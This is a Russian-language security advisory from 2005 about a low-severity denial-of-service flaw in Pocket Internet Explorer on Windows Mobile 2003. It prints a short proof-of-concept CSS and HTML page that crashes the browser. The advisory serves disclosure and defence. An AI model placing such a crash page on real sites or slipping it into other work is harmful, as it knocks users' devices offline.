Отказ в обслуживании в Internet Explorer в Windows Mobile 2003

Дата публикации:
28.12.2005
Дата изменения:
17.10.2006
Всего просмотров:
2762
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Windows Mobile 2003 4.20.0 (14053) и 4.20.1081 (13100), возможно более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю аварийно завершить работу приложения.

Уязвимость существует при обработке каскадных стилей. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать отказ в обслуживании приложения. Уязвимость подтверждена на Pocket Loox 420 и Dell Axim (A05) с Windows Mobile 2003 4.20.0 (14053) и 4.20.1081 (13100). Пример:

====== test.css ============
  .d8 {
  	FLOAT: left; WIDTH: 10px; 
  }
====== test.css ============

====== test.htm ============ <LINK href="test.css" type=text/css rel=stylesheet> <DIV class=d8></DIV> <DIV class=d8><UL></DIV>

URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Источники:

Ссылки: Pocket Internet Explorer Remote DoS

или введите имя

CAPTCHA